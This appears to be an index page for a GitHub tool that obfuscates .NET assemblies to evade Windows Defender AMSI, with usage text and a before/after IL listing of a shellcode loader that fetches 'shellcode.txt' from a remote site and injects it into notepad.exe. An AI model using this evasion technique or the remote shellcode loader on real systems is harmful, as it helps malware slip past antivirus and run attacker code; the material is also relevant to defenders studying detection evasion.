Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/BinaryScary/NET-Obfuscate
Obfuscate ECMA CIL (.NET IL) assemblies to evade Windows Defender AMSI
https://github.com/BinaryScary/NET-Obfuscate
Last synced: about 2 months ago
JSON representation
Obfuscate ECMA CIL (.NET IL) assemblies to evade Windows Defender AMSI
- Host: GitHub
- URL: https://github.com/BinaryScary/NET-Obfuscate
- Owner: BinaryScary
- Created: 2020-04-30T22:34:07.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2023-06-09T13:18:41.000Z (over 1 year ago)
- Last Synced: 2024-08-05T17:26:25.959Z (5 months ago)
- Language: C#
- Size: 32.2 KB
- Stars: 231
- Watchers: 6
- Forks: 50
- Open Issues: 1
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - BinaryScary/NET-Obfuscate - Obfuscate ECMA CIL (.NET IL) assemblies to evade Windows Defender AMSI (C# #)
README
# NET-Obfuscate
Obfuscate ECMA CIL (.NET IL) assemblies to evade Windows Defender AMSI.
```
PS C:\Users\User\Source\Repos\NET-Obfuscate\NET-Obfuscate\bin\x64\Release> .\NET-Obfuscate.exe -h Usage:
NET-Obfuscate [options]Options:
--in-file The .Net assembly path you want to obfuscate
--out-file Path to the newly obfuscated file, default is "inFile".obfuscated
--version Show version information
-?, -h, --help Show help and usage information
```## TikiSpawn Example(IL):
*Before:*
```
.class public auto ansi beforefieldinit TikiSpawn
extends [mscorlib]System.Object
{
.custom instance void [mscorlib]System.Runtime.InteropServices.ComVisibleAttribute::.ctor(bool) = (
01 00 01 00 00
)
// Methods
// Token: 0x06000002 RID: 2 RVA: 0x0000204F File Offset: 0x0000024F
.method public hidebysig specialname rtspecialname
instance void .ctor () cil managed
{
// Header Size: 1 byte
// Code Size: 23 (0x17) bytes
.maxstack 8/* (13,5)-(13,23) C:\Users\User\Source\Repos\TikiTorch\TikiSpawn\Program.cs */
/* 0x00000250 02 */ IL_0000: ldarg.0
/* 0x00000251 280100000A */ IL_0001: call instance void [mscorlib]System.Object::.ctor()
/* (15,9)-(15,82) C:\Users\User\Source\Repos\TikiTorch\TikiSpawn\Program.cs */
/* 0x00000256 02 */ IL_0006: ldarg.0
/* 0x00000257 7201000070 */ IL_0007: ldstr "c:\\windows\\notepad.exe"
/* 0x0000025C 722F000070 */ IL_000C: ldstr "http://site.com/shellcode.txt"
/* 0x00000261 2806000006 */ IL_0011: call instance void TikiSpawn::Flame(string, string)
/* (16,5)-(16,6) C:\Users\User\Source\Repos\TikiTorch\TikiSpawn\Program.cs */
/* 0x00000266 2A */ IL_0016: ret
} // end of method TikiSpawn::.ctor
```
*After:*
```
.class public auto ansi beforefieldinit EVMR2Y8ZMC.JPEQYLSVTO
extends [mscorlib]System.Object
{
.custom instance void [mscorlib]System.Runtime.InteropServices.ComVisibleAttribute::.ctor(bool) = (
01 00 01 00 00
)
// Methods
// Token: 0x06000002 RID: 2 RVA: 0x0000204F File Offset: 0x0000024F
.method public hidebysig specialname rtspecialname
instance void .ctor () cil managed
{
// Header Size: 1 byte
// Code Size: 55 (0x37) bytes
.maxstack 8/* 0x00000250 02 */ IL_0000: ldarg.0
/* 0x00000251 281000000A */ IL_0001: call instance void [mscorlib]System.Object::.ctor()
/* 0x00000256 02 */ IL_0006: ldarg.0
/* 0x00000257 00 */ IL_0007: nop
/* 0x00000258 281100000A */ IL_0008: call class [mscorlib]System.Text.Encoding [mscorlib]System.Text.Encoding::get_UTF8()
/* 0x0000025D 7201000070 */ IL_000D: ldstr "Yzpcd2luZG93c1xub3RlcGFkLmV4ZQ=="
/* 0x00000262 281200000A */ IL_0012: call uint8[] [mscorlib]System.Convert::FromBase64String(string)
/* 0x00000267 6F1300000A */ IL_0017: callvirt instance string [mscorlib]System.Text.Encoding::GetString(uint8[])
/* 0x0000026C 00 */ IL_001C: nop
/* 0x0000026D 281100000A */ IL_001D: call class [mscorlib]System.Text.Encoding [mscorlib]System.Text.Encoding::get_UTF8()
/* 0x00000272 7243000070 */ IL_0022: ldstr "asRsdcDsdvsdzEsdi4xNjzuNzI5MTY2g3NoxsY2asdf9sdZsd50eHQ="
/* 0x00000277 281200000A */ IL_0027: call uint8[] [mscorlib]System.Convert::FromBase64String(string)
/* 0x0000027C 6F1300000A */ IL_002C: callvirt instance string [mscorlib]System.Text.Encoding::GetString(uint8[])
/* 0x00000281 2806000006 */ IL_0031: call instance void EVMR2Y8ZMC.JPEQYLSVTO::'40W6NX6Z4J'(string, string)
/* 0x00000286 2A */ IL_0036: ret
} // end of method JPEQYLSVTO::.ctor
```